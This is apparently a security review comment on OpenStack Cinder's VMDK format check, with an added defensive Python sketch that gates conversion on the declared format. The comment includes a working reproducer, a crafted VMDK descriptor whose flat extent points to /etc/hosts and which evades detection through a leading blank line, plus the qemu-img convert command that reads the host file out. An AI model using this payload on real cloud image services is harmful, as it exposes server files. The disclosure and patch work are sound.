About Cinder, I think we should put the check_vmdk_format as close as possible to the call to convert.
First, I think we may be missing some convert_images. I cannot test it, but I have come across this where we seem to convert an image into a volume directly: https://opendev.org/openstack/cinder/src/branch/master/cinder/volume/drivers/netapp/dataontap/nfs_base.py#L767
Second, I noted that, in the case of AMI image format, we let qemu-img convert detect the real format of the image: https://opendev.org/openstack/cinder/src/branch/master/cinder/image/image_utils.py#L277
I think this is caught as part of the proposed patch, but there could be similar constructions elsewhere.
Third, in fetch_to_volume_format, we first check the VMDK createType if qemu-img info detects a VMDK, but we call the convert with the format declared in the image metadata.
Importantly, I was able to trick qemu-img info into detecting a "raw" image that can actually be converted from VMDK to raw by simply adding an empty line at the beginning of the file, thus (if I understand correctly) bypassing the check entirely.
Here's a short reproducer, note the empty line before # Disk DescriptorFile:
cat > test.raw << EOF

# Disk DescriptorFile
version=1
CID=86cc8022
parentCID=ffffffff
createType="monolithicFlat"
# Extent description
RW 2048 FLAT "/etc/hosts" 0
# The Disk Data Base
#DDB
ddb.virtualHWVersion = "4"
ddb.geometry.cylinders = "2"
ddb.geometry.heads = "16"
ddb.geometry.sectors = "63"
ddb.adapterType = "ide"
EOF
qemu-img info test.raw
image: test.raw
file format: raw
virtual size: 512 B (512 bytes)
disk size: 4 KiB
qemu-img convert -f vmdk -O raw test.raw hacked.raw
I'll look again at the nova patch to make sure we account for that funny discovery there too.
About glance, I think we should also patch it as part of this effort, even though it's not as bad given the fact the exploit is unavailable by default.
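The following is an added example, not part of the original comment and not Cinder's code: a sketch of gating on the format that will actually be passed to qemu-img convert, rather than on what qemu-img info reports, using a descriptor scan that tolerates leading blank lines. The function names, the allowlist contents and the sample bytes are assumptions constructed for illustration, and the caller is assumed to pass enough leading bytes of the image to cover the descriptor.

```python
import re
from typing import Optional

# Assumption: subformats that keep all their data inside the image file itself.
ALLOWED_CREATE_TYPES = {"streamOptimized", "monolithicSparse"}

# Matched per line (MULTILINE) and tolerant of leading whitespace, so the
# descriptor is found even when it does not start at offset 0.
_CREATE_TYPE = re.compile(rb'^[ \t]*createType[ \t]*=[ \t]*"([^"]*)"', re.M)


def vmdk_create_type(head: bytes) -> Optional[str]:
    """Return the createType of a VMDK descriptor found in `head`, or None."""
    m = _CREATE_TYPE.search(head)
    return m.group(1).decode("ascii", "replace").strip() if m else None


def convert_allowed(head: bytes, convert_format: Optional[str]) -> bool:
    """Decide based on the value that will be given to `qemu-img convert -f`.

    convert_format=None means qemu-img would probe the format itself.
    """
    create_type = vmdk_create_type(head)
    if convert_format == "vmdk":
        # Fail closed: the subformat must be identified and allowlisted.
        return create_type in ALLOWED_CREATE_TYPES
    if convert_format is None:
        # Probing may select the VMDK driver, so any descriptor must be allowed.
        return create_type is None or create_type in ALLOWED_CREATE_TYPES
    # An explicit non-VMDK driver never interprets the descriptor.
    return True


# Constructed samples: a flat descriptor preceded by an empty line, and a
# sparse descriptor. The extent file name is a placeholder.
SAMPLE_FLAT = (b'\n# Disk DescriptorFile\nversion=1\n'
               b'createType="monolithicFlat"\n'
               b'RW 2048 FLAT "extent-placeholder.bin" 0\n')
SAMPLE_SPARSE = b'# Disk DescriptorFile\nversion=1\ncreateType="monolithicSparse"\n'

if __name__ == "__main__":
    for fmt in ("vmdk", None, "raw"):
        print(fmt, convert_allowed(SAMPLE_FLAT, fmt), convert_allowed(SAMPLE_SPARSE, fmt))
```

Because the decision is keyed on the convert format and not on a separate probe, a file that probes as raw but is declared as VMDK is still subject to the subformat allowlist.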